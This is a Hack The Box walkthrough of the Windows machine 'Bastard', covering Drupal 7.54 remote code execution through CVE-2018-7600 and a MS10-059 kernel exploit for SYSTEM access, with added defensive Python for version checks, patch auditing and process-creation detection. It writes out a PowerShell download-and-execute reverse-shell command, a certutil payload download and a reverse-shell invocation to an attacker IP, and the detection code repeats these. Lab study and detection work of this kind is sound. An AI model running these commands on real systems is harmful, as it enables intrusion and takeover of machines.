Bastard – Hack The Box

Overall Summary

Bastard is a Windows machine from Hack The Box that is vulnerable to RCE through Drupal, and privilege escalation can be accomplished with a kernel exploit because the system lacks patches. Overall, Bastard is an easy machine and it can be exploited in more than one way.

Scanning and Enumeration

A full TCP nmap scan shows three ports open.

Browsing to the HTTP server displays a login page for Drupal, which nmap identified as version 7.

If we browse to the CHANGELOG.txt file, which nmap also discovered, we see that the exact version is Drupal 7.54.
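The version leak above is the first thing a defender can check for. The following Python script is an added example (not code from the writeup or from Drupal) that parses the release header a Drupal 7 CHANGELOG.txt starts with and decides whether the site is on a release older than the one that fixed CVE-2018-7600. It assumes that 7.58 is the fixed Drupal 7 release (SA-CORE-2018-002) and only handles the 7.x branch; the sample CHANGELOG text is constructed, not taken from the target.

```python
import re

# Constructed sample of the first lines of a Drupal 7 CHANGELOG.txt. Real
# Drupal 7 changelogs open with "Drupal <major>.<minor>, <date>" for the
# newest release, which is why serving the file publicly leaks the version.
SAMPLE_CHANGELOG = """Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition).
- Bug fixes and documentation improvements.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/Chromium versions.
"""

# Assumption: Drupal 7.58 is the release that fixed CVE-2018-7600 on the 7.x
# branch; everything older on 7.x is affected.
FIXED_VERSION = (7, 58)

HEADER_RE = re.compile(r"^Drupal (\d+)\.(\d+),", re.MULTILINE)


def parse_drupal_version(changelog_text):
    """Return (major, minor) of the newest release listed, or None."""
    m = HEADER_RE.search(changelog_text)  # first header is the newest release
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_vulnerable_to_cve_2018_7600(version):
    """True if a 7.x version predates the fix, False if fixed, None if unknown."""
    if version is None or version[0] != 7:
        return None  # other branches have their own fixed releases; not handled here
    return version < FIXED_VERSION


def assess_changelog(changelog_text):
    """Combine both steps into one verdict a scanner could report."""
    version = parse_drupal_version(changelog_text)
    verdict = is_vulnerable_to_cve_2018_7600(version)
    return {
        "version": None if version is None else "%d.%d" % version,
        "vulnerable": verdict,
        "recommendation": (
            "block public access to CHANGELOG.txt and update Drupal core"
            if verdict else "verify the branch manually"
            if verdict is None else "no action for CVE-2018-7600"
        ),
    }


if __name__ == "__main__":
    print(assess_changelog(SAMPLE_CHANGELOG))
```

The check is deliberately version-based rather than exploit-based: a scanner that only confirms the version leak is enough to prioritise the patch, and the same parser works against a changelog fetched from any Drupal 7 site.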

Exploitation

Just by looking for vulnerabilities and exploits for version 7.54, I was able to come across https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py, a Python exploit for CVE-2018-7600, a vulnerability that allows arbitrary code execution because of an issue with module configurations. The exploit can be run by providing only a URL, but it then executes the command "id" by default; since this is a Windows machine, the command has to be passed as a parameter. This is how I executed the script:

python3 drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9/

To get a reverse shell I'll use https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1, a PowerShell reverse shell from Nishang. I'll first host the file on my attacking machine with Python's SimpleHTTPServer, set up a netcat listener on port 443, and finally run the exploit script with a command that downloads and executes the reverse shell. This is the full invocation, with the PowerShell command passed as the -c parameter:

python3 drupa7-CVE-2018-7600.py -c "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 443" http://10.10.10.9/

I was able to successfully get a PowerShell reverse shell.

Post-Exploitation

Running the systeminfo command shows that the machine doesn't have any hotfixes applied, which means that a kernel exploit will most likely be used.

I fed the output of that command to the tool windows-exploit-suggester.py, and it returned several candidate exploits.
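The "no hotfixes" observation is exactly what a patch-compliance check looks for. The Python below is an added example, not code from the writeup or from windows-exploit-suggester: it parses the Hotfix(s) section of systeminfo output and reports which bulletins from a small required list are missing. Both systeminfo samples are constructed (the host name, OS build and KB list are illustrative, not the target's), and the bulletin-to-KB mapping is an assumption kept to a single entry (MS10-059 as KB982799); a real deployment would load the full mapping from Microsoft's bulletin data.

```python
import re

# Constructed systeminfo output for a host with no hotfixes, mirroring what the
# writeup describes. Values are illustrative, not captured from the target.
SAMPLE_UNPATCHED = """Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed output for a host that has the MS10-059 update installed.
SAMPLE_PATCHED = """Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB982799
Network Card(s):           1 NIC(s) Installed.
"""

# Assumption: MS10-059 ships as KB982799. Extend this dict from the vendor's
# bulletin data; one entry is enough to show the comparison.
REQUIRED_KBS = {"MS10-059": "KB982799"}

KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_hotfixes(systeminfo_text):
    """Return the set of KB identifiers listed under 'Hotfix(s):'."""
    kbs = set()
    in_section = False
    for line in systeminfo_text.splitlines():
        if line.startswith("Hotfix(s):"):
            in_section = True  # 'N/A' on this line yields no KB, as intended
            continue
        if in_section:
            if not line.startswith(" "):
                break  # next top-level field ends the indented hotfix list
            m = KB_RE.search(line)
            if m:
                kbs.add(m.group(1))
    return kbs


def missing_bulletins(systeminfo_text, required=REQUIRED_KBS):
    """Bulletins whose KB is absent from the host's installed hotfixes."""
    installed = parse_hotfixes(systeminfo_text)
    return sorted(b for b, kb in required.items() if kb not in installed)


if __name__ == "__main__":
    print("unpatched host missing:", missing_bulletins(SAMPLE_UNPATCHED))
    print("patched host missing:", missing_bulletins(SAMPLE_PATCHED))
```

Running it against an export of systeminfo from every server gives a quick inventory of hosts on which a 2010-era kernel exploit would still work; the fix is simply to bring them under normal patch management.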

Going down the list, I was able to get the MS10-059 exploit working. The compiled binary can be downloaded from https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled. I uploaded it to the machine using certutil as follows:

certutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.exe
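Both transfers in this writeup, the PowerShell download cradle used for the reverse shell and the certutil upload above, are loud in process-creation telemetry. The Python below is an added example (not from the writeup or any vendor product) of the detection logic a defender would run over such events: it flags a web-server worker spawning a shell, a PowerShell command line containing a download cradle, and certutil fetching from a URL. The events are constructed in the shape of Sysmon Event ID 1 records; two of the command lines are the ones quoted in this post. The assumption that Drupal runs under IIS with PHP is only reflected in the parent-process list, which should be adapted to the environment.

```python
import re

# Constructed process-creation events (parent image, image, command line).
# Events 1 and 2 reuse the command lines quoted in the writeup; the others
# are benign noise to show the rules do not fire on normal activity.
EVENTS = [
    {"parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell iex (New-Object Net.WebClient).DownloadString("
                "'http://10.10.14.19:80/Invoke-PowerShellTcp.ps1');"
                "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 443"},
    {"parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -f http://10.10.14.19/Chimichurri.exe "
                "Chimichurri.exe"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\user\\notes.txt"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil -hashfile setup.exe SHA256"},
]

# Assumption: the PHP application is served by IIS (w3wp.exe / php-cgi.exe);
# httpd.exe covers an Apache deployment. Adjust to the real web worker.
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Download-cradle indicators seen in the quoted reverse-shell command line.
CRADLE_RE = re.compile(
    r"new-object\s+net\.webclient|downloadstring|\biex\b|invoke-expression",
    re.IGNORECASE,
)
# certutil used as a downloader: -urlcache followed by an http(s) URL.
CERTUTIL_RE = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)


def evaluate(event):
    """Return the list of rule names that match one process-creation event."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"]
    hits = []
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web_worker_spawned_shell")
    if image == "powershell.exe" and CRADLE_RE.search(cmd):
        hits.append("powershell_download_cradle")
    if image == "certutil.exe" and CERTUTIL_RE.search(cmd):
        hits.append("certutil_remote_download")
    return hits


def scan(events):
    """Return (index, rules) for every event that triggered at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, rules in scan(EVENTS):
        print(index, EVENTS[index]["image"], rules)
```

The first rule is the most valuable one: a web-server worker should never spawn cmd.exe or powershell.exe, so that parent/child pair alone catches the initial RCE regardless of which Drupal exploit produced it. The other two rules cover the tooling stage and are cheap to add to the same pipeline.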

The exploit must be run with the attacking machine's IP address and a port number on which to receive the reverse shell. This is how it's executed:

./Chimichurri.exe 10.10.14.19 4321

After a few seconds I was able to successfully get a reverse shell as "nt authority\system".
